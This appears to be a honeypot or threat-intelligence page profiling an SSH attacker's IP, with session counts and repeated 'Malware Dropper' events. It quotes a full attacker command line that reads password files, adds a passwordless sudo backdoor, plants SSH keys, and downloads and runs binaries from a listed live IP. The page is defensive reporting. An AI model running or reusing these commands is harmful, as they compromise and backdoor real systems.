← Back to feed
Location
🇨🇳 CN / Nanjing
ASN
AS4134 · Chinanet
Cloud Provider
—
Total Events
1313
Top 5% by volume
Agent Count
1
First / Last Seen
2026-05-02 22:00 — 2026-05-02 22:30
Attack Types
MITRE ATT&CK Techniques
Initial Access
Execution
Command and Control
External Corroboration
Not flagged by any external feeds
Campaigns
Not associated with any campaigns
Session Forensics
Sessions
201 (19 with login)
Avg Depth Score
0.35
Commands Executed
60
Files Downloaded
50
Notable Commands
- uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers;chsh -s /bin/sh daemon;echo Password123 |passwd daemon --stdin;mkdir ~/.ssh;chattr -ia ~/.ssh/* ~/.ssh;wget http://103.56.149.224/cacti/ns1.jpg -O ~/.ssh/authorized_keys;chmod 600 ~/.ssh/authorized_keys;chmod 700 ~/ ~/.ssh;wget http://103.56.149.224/cacti/ns3.jpg -O /tmp/x;chmod +x /tmp/x;/tmp/x;mv /tmp/x /tmp/o;/tmp/o;rm -f /tmp/o;mkdir /sbin/.ssh;cp ~/.ssh/authorized_keys /sbin/.ssh;chown daemon.daemon /sbin/.ssh /sbin/.ssh/*;chmod 700 /sbin/.ssh;chmod 600 /sbin/.ssh/authorized_keys;wget http://103.56.149.224/cacti/oto -O /tmp/oto;chmod 755 /tmp/oto;/tmp/oto;curl http://103.56.149.224/cacti/oto -o /tmp/oto;chmod 755 /tmp/oto;/tmp/oto;rm -f /tmp/oto
- chsh -s /bin/sh daemon
- /tmp/x
- /tmp/o
- /tmp/oto
Download URLs
- http://103.56.149.224/cacti/oto
- http://103.56.149.224/cacti/ns1.jpg
- http://103.56.149.224/cacti/ns3.jpg
Fingerprints
HASSH
SSH Client
Evidence Timeline
Malware Dropper
b7963e2fd66d
LOGIN
6
1
1
100%
Loading events...
HASSH 92674389fa1e47a…
SSH-2.0-libssh2_1.4.3
$ uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon …$ chsh -s /bin/sh daemon$ /tmp/x $ /tmp/o $ /tmp/oto
Malware Dropper
25621aed1f34
LOGIN
5
1
1
100%
Loading events...
HASSH 92674389fa1e47a…
SSH-2.0-libssh2_1.4.3
$ uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon …$ chsh -s /bin/sh daemon$ /tmp/x $ /tmp/o $ /tmp/oto
http://103.56.149.224/cacti/oto
Malware Dropper
08f1a9e26cf6
LOGIN
5
1
1
100%
Loading events...
HASSH 92674389fa1e47a…
SSH-2.0-libssh2_1.4.3
$ uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon …$ chsh -s /bin/sh daemon$ /tmp/x $ /tmp/o $ /tmp/oto
http://103.56.149.224/cacti/oto
Malware Dropper
1454df9d85f4
LOGIN
5
1
1
100%
Loading events...
HASSH 92674389fa1e47a…
SSH-2.0-libssh2_1.4.3
$ uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon …$ chsh -s /bin/sh daemon$ /tmp/x $ /tmp/o $ /tmp/oto
http://103.56.149.224/cacti/oto
Malware Dropper
d60a0d4144d4
LOGIN
2
4
1
100%
Loading events...
HASSH 92674389fa1e47a…
SSH-2.0-libssh2_1.4.3
$ uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon …$ chsh -s /bin/sh daemon
http://103.56.149.224/cacti/ns1.jpghttp://103.56.149.224/cacti/ns3.jpghttp://103.56.149.224/cacti/oto
Malware Dropper
4af00f892294
LOGIN
2
3
1
100%
Loading events...
HASSH 92674389fa1e47a…
SSH-2.0-libssh2_1.4.3
$ uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon …$ chsh -s /bin/sh daemon
http://103.56.149.224/cacti/ns1.jpghttp://103.56.149.224/cacti/ns3.jpghttp://103.56.149.224/cacti/oto
Malware Dropper
f8377ccb3370
LOGIN
2
4
1
100%
Loading events...
HASSH 92674389fa1e47a…
SSH-2.0-libssh2_1.4.3
$ uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon …$ chsh -s /bin/sh daemon
http://103.56.149.224/cacti/ns1.jpghttp://103.56.149.224/cacti/ns3.jpghttp://103.56.149.224/cacti/oto
Malware Dropper
49f6e581b524
LOGIN
2
3
1
100%
Loading events...
HASSH 92674389fa1e47a…
SSH-2.0-libssh2_1.4.3
$ uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon …$ chsh -s /bin/sh daemon
http://103.56.149.224/cacti/ns1.jpghttp://103.56.149.224/cacti/ns3.jpghttp://103.56.149.224/cacti/oto
Malware Dropper
411535ebb5b3
LOGIN
2
4
1
100%
Loading events...
HASSH 92674389fa1e47a…
SSH-2.0-libssh2_1.4.3
$ uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon …$ chsh -s /bin/sh daemon
http://103.56.149.224/cacti/ns1.jpghttp://103.56.149.224/cacti/ns3.jpghttp://103.56.149.224/cacti/oto